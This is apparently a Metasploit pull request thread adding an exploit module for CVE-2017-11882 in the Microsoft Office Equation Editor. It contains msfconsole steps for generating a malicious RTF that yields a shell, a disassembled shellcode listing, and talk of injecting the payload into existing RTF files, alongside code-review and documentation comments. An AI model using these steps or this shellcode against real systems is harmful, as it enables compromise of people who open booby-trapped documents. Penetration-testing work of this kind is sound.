CVE-2017-11882 Microsoft Office Memory Corruption

[ghost]

PR adds the recent CVE-2017-11882 vulneralbility which allows code execution as the user opening the document. Different than PoC from Embedi, allows more space.

Verification

List the steps needed to make sure this thing works

• msfconsole
• use exploit/windows/fileformat/office_ms17_11882
• set PAYLOAD [PAYLOAD]
• set FILENAME /path/to/file.rtf
• run

Should obtain shell.

Tested

Tested on MS Office 2010 SP 2 Windows 7

[0xIslamTaha]

I'm wondering why it should be .rtf file?

[ghost]

@islamTaha12 OLE

[jmartin-tech]

Could this be extracted into something like lib/msf/core/exploit/rtf.rb and take a parameter payload or uri?

This would make malicious rtf file generation reusable and possibly allow for a utility to expand and offer "injection" into existing rtf files.

[ghost]

Yeah, I believe this would be easily possible. Should I put this into that directory, with that name and PR it, with a "command" parameter? @jmartin-r7

[ghost]

If thats what you're implying, unless im misunderstanding :D

[jmartin-tech]

@realoriginal, I would suggest just refactor this code in a new commit added here, and extract this method into a similar utility as other files in the lib/msf/core/exploit path.

[ghost]

This still required, since I've now just put an injection style into the module or? @jmartin-r7 all good if so

[jmartin-tech]

Not required from my view just a preferred item. The injection style you used is specific to how this module functions with payload being something of a web delivery. We can open an issue to request refactor into of utility for rtf or maybe really in this case OLE separately. I since @wwebb-r7 has assigned this PR I will defer to him.

[wwebb-r7]

We'll need some documentation or provenance on the shellcode. Either one large block comment or traditional side comments of each instruction. If you reused someone else's and they happen to have that, you can link it and we may be able to push this through and do it afterwards.

[ghost]

No problem, I did use someone elses, and ...Ill go find it :)

[ghost]

Disassembly of the shellcode

    0:   1c 00                   sbb    al,0x0
    2:   00 00                   add    BYTE PTR [eax],al
    4:   02 00                   add    al,BYTE PTR [eax]
    6:   9e                      sahf
    7:   c4 a9 00 00 00 00       les    ebp,FWORD PTR [ecx+0x0]
    d:   00 00                   add    BYTE PTR [eax],al
    f:   00 c8                   add    al,cl
   11:   a7                      cmps   DWORD PTR ds:[esi],DWORD PTR es:[edi]
   12:   5c                      pop    esp
   13:   00 c4                   add    ah,al
   15:   ee                      out    dx,al
   16:   5b                      pop    ebx
   17:   00 00                   add    BYTE PTR [eax],al
   19:   00 00                   add    BYTE PTR [eax],al
   1b:   00 03                   add    BYTE PTR [ebx],al
   1d:   01 01                   add    DWORD PTR [ecx],eax
   1f:   03 0a                   add    ecx,DWORD PTR [edx]
   21:   0a 01                   or     al,BYTE PTR [ecx]
   23:   08 5a 5a                or     BYTE PTR [edx+0x5a],bl
   26:   b8 44 eb 71 12          mov    eax,0x1271eb44
   2b:   ba 78 56 34 12          mov    edx,0x12345678
   30:   31 d0                   xor    eax,edx
   32:   8b 08                   mov    ecx,DWORD PTR [eax]
   34:   8b 09                   mov    ecx,DWORD PTR [ecx]
   36:   8b 09                   mov    ecx,DWORD PTR [ecx]
   38:   66 83 c1 3c             add    cx,0x3c
   3c:   31 db                   xor    ebx,ebx
   3e:   53                      push   ebx
   3f:   51                      push   ecx
   40:   be 64 3e 72 12          mov    esi,0x12723e64
   45:   31 d6                   xor    esi,edx
   47:   ff 16                   call   DWORD PTR [esi]
   49:   53                      push   ebx
   4a:   66 83 ee 4c             sub    si,0x4c
   4e:   ff 10                   call   DWORD PTR [eax]
   50:   90                      nop
   51:   90                      nop

[ghost]

I'll put it next to it

[ghost]

Some other information, PDF. https://29wspy.ru/reversing/CVE-2017-11882.pdf

[wwebb-r7]

Nice, thanks. If you don't get around to adding them to the module by tomorrow night, I may do it myself and send you a PR so we can try to get this merged.

[ghost]

All good . I should have some time tommorow morning to do it

[ghost]

Done! :D. Thought I might also try one last thing, to see if I can inject existing RTF's

[ghost]

Nevermind, figured it out, just had to put return header afterwards.

[wwebb-r7]

I had a comment typed out, but let me look over your new commit first

Edit: @realoriginal alright, I was going to suggest an alternate route to get both the rtf injection and the module done separately, but seeing how you're making good progress on it, carry on.

[ghost]

:D. Sounds good. Yeah after this is done, I was gonna try and look at putting /lib/msf/core/exploit/rtf.rb something there, which I may need help with, as jmartin said.

[wwebb-r7]

A couple of minor things regarding documentation

Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents.

I'd avoid making relative time references. I'd wager that most would eventually figure it out, but this is potentially confusing to someone looking at this in 2028.

Module exploits a flaw in the Equation Editor, developed
in 2000, that allowed any OLE object to execute in a separate
address space. Compared to original PoC, allows for a command within
a length of 109 bytes to be executed Affects Microsoft Office word for the latest 17 years

Same thing here along with some other grammatical errors and the mention of a separate PoC. The description in the info hash should stick to the formula

This module exploits a (whatever vulnerability class) present in (whatever product along with version). The vulnerability is caused by (root cause) and can be triggered by (whatever the exploit vector is)

or something along those lines. I'm not going to let those hold up merging though. I'll correct them myself later unless you really want to.

[ghost]

Ahh I see. fixing now.

[ghost]

Updated with the appropriate syntax.

[wwebb-r7]

Well that was quick, thanks. If I see anything else I'll take care of it.

[ghost]

haha thought id take a break from metasploitable CTF and check on the PRs haha.

Thank you sir!

[wwebb-r7]

Release Notes

This update adds an exploit for CVE-2017-11882, a memory corruption vulnerability when parsing OLE objects in Microsoft Office